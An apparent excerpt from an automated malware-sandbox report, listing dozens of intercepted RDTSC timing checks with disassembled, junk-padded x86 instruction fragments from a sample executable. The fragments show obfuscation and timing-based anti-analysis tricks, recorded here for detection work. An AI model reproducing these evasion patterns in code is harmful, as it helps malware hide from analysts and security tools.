                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 930681 second address: 930699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 930AF6 second address: 930AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934542 second address: 93457E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F05F0F594A9h 0x00000012 jp 00007F05F0F59496h 0x00000018 jbe 00007F05F0F59496h 0x0000001e popad 0x0000001f jc 00007F05F0F594BDh 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F09F3 second address: 8D692F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov ecx, dword ptr [ebp+122D2DA1h] 0x0000000d lea eax, dword ptr [ebp+1247C75Ch] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F05F0F49758h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d xor ecx, 3AA68239h 0x00000033 push eax 0x00000034 jno 00007F05F0F4975Eh 0x0000003a mov dword ptr [esp], eax 0x0000003d mov dword ptr [ebp+122D2A64h], edi 0x00000043 call dword ptr [ebp+1244F550h] 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e pop edx 0x0000004f jmp 00007F05F0F49764h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F0EE2 second address: 8F0EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F0EE7 second address: 8F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F0FB1 second address: 8F0FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F0FC5 second address: 8F0FCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1AD7 second address: 8F1ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1ADB second address: 8F1AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1AFC second address: 8F1B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1B00 second address: 8F1B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1C84 second address: 8F1C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1D3B second address: 8F1DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F4975Ch 0x00000009 popad 0x0000000a jmp 00007F05F0F49760h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F05F0F49758h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D35B3h], edx 0x00000033 lea eax, dword ptr [ebp+1247C7A0h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F05F0F49758h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 call 00007F05F0F49763h 0x00000059 pop eax 0x0000005a sub dword ptr [ebp+122D2A28h], eax 0x00000060 popad 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushad 0x00000066 popad 0x00000067 jmp 00007F05F0F4975Bh 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1DDE second address: 8F1DED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1DED second address: 8F1E3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F05F0F49756h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12451DD4h], ebx 0x00000013 lea eax, dword ptr [ebp+1247C75Ch] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F05F0F49758h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 add edi, dword ptr [ebp+122D2FC1h] 0x00000039 push eax 0x0000003a jl 00007F05F0F49768h 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F05F0F49756h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9348AE second address: 9348BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05F0F59496h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9348BA second address: 9348D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F49765h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934A59 second address: 934A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934A5D second address: 934A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934A63 second address: 934A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934F44 second address: 934F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Eh 0x00000007 jmp 00007F05F0F49762h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934F68 second address: 934F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 934F6D second address: 934F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F49766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93FE4B second address: 93FE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93FE51 second address: 93FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93FE56 second address: 93FE7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F594A5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 93FFF3 second address: 940002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05F0F49756h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 942B36 second address: 942B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B3F68 second address: 8B3F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F05F0F49756h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F05F0F49756h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 946D15 second address: 946D33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05F0F59496h 0x00000008 jmp 00007F05F0F594A4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94708F second address: 947095 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 947333 second address: 94733C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9474FC second address: 947500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94D838 second address: 94D83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94D83C second address: 94D85E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F05F0F49764h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94D85E second address: 94D862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94D862 second address: 94D889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 jmp 00007F05F0F4975Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94C10A second address: 94C10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94C3EE second address: 94C415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F05F0F49767h 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F05F0F49756h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94C415 second address: 94C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94C419 second address: 94C437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05F0F49763h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 94C6B8 second address: 94C6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F164A second address: 8F164E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F164E second address: 8F1652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1652 second address: 8F1658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1658 second address: 8F1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950A54 second address: 950A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950A5A second address: 950A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950392 second address: 9503C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05F0F49767h 0x00000011 jmp 00007F05F0F49763h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9503C8 second address: 9503CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9580D8 second address: 9580DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9580DE second address: 9580EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 958F5A second address: 958F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D2C4 second address: 95D2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D588 second address: 95D597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D597 second address: 95D5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F05F0F594A9h 0x0000000b popad 0x0000000c jc 00007F05F0F594A6h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D87B second address: 95D891 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F05F0F4975Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D891 second address: 95D895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D895 second address: 95D899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC4B second address: 95DC51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC51 second address: 95DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F05F0F49756h 0x00000010 jmp 00007F05F0F49761h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC72 second address: 95DC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC90 second address: 95DC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC96 second address: 95DCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DCA0 second address: 95DCAA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F05F0F49756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DCAA second address: 95DCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A8h 0x0000000c jmp 00007F05F0F5949Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DE53 second address: 95DE58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 969D24 second address: 969D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96A546 second address: 96A554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AA9E second address: 96AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AABA second address: 96AABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AABF second address: 96AAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F05F0F594A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jl 00007F05F0F59496h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 972226 second address: 97222A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97237D second address: 972396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F05F0F594A0h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 972396 second address: 9723AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49760h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723AB second address: 9723C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F5949Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723C1 second address: 9723C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723C5 second address: 9723E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723E2 second address: 9723E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723E8 second address: 9723EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723EE second address: 9723F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FB7D second address: 97FB87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FB87 second address: 97FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD34 second address: 97FD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD3A second address: 97FD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F05F0F49756h 0x00000010 jbe 00007F05F0F49756h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD50 second address: 97FD5A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD5A second address: 97FD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9846E1 second address: 9846E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 991B8B second address: 991BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F05F0F49761h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
